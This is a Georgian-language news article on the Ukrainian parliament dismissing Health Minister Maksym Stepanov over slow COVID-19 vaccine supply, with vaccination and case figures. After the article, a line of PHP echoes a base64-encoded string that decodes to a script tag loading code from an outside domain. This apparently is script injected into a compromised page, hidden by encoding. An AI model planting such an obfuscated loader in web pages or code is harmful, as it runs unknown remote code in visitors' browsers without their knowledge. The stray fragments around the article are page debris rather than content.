celsiusi
ავერსი შნაიდერი
უკრაინის პარლამენტმა ჯანდაცვის მინისტრი მაქსიმ სტეპანოვი ქვეყანაში კორონავირუსის საწინააღმდეგო ვაქცინის ნაკლებობის გამო თანამდებობიდან გადააყენა. 
 
როგორც Reuters-ი იუწყება, მაქსიმ სტეპანოვი დღეს გადააყენეს და ის დაადანაშაულეს იმაში, რომ საჭირო რაოდენობის დოზების უზრუნველყოფა ვერ შეძლო.
 
აღსანიშნავია, რომ 41-მილიონიან უკრაინაში ვაქცინის პირველი დოზა 18 მაისის მდგომარეობით მხოლოდ 948 000 მოქალაქეს აქვს მიღებული.
 
„მინისტრის მთავარი ამოცანა 2021 წელს ვაქცინაცია და მიმდინარე წლის პირველ ნახევარში უკრაინის საკმარისი რაოდენობის ვაქცინით უზრუნველყოფა იყო. ამ საკითხზე პროგრესი ძალიან ნელია“, - განაცხადა უკრაინის პრემიერ-მინისტრმა დენის შმიგალმა პარლამენტში. პრემიერმა უკრაინის რადას ჯანდაცვის მინისტრის გადაყენების თხოვნით ფორმალურად გასულ კვირას მიმართა.
 
„ამ დრომდე უკრაინაში 2.3 მილიონი დოზა ვაქცინა არის ჩამოტანილი, რასაც რთულია უწოდო ჯანდაცვის მინისტრის ეფექტური მუშაობა“, - დასძინა მან.
 
თავის მხრივ სტეპანოვმა განაცხადა, რომ მან ყველაფერი გააკეთა ეპიდემიასთან ბრძოლისთვის, რაც შეეძლო.
ცნობისთვის, უკრაინაში ამ დრომდე 2 მილიონზე მეტი კოვიდ-შემთხვევაა გამოვლენილი. ვირუსს 48 469 ადამიანი ემსხვერპლა.
1108
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");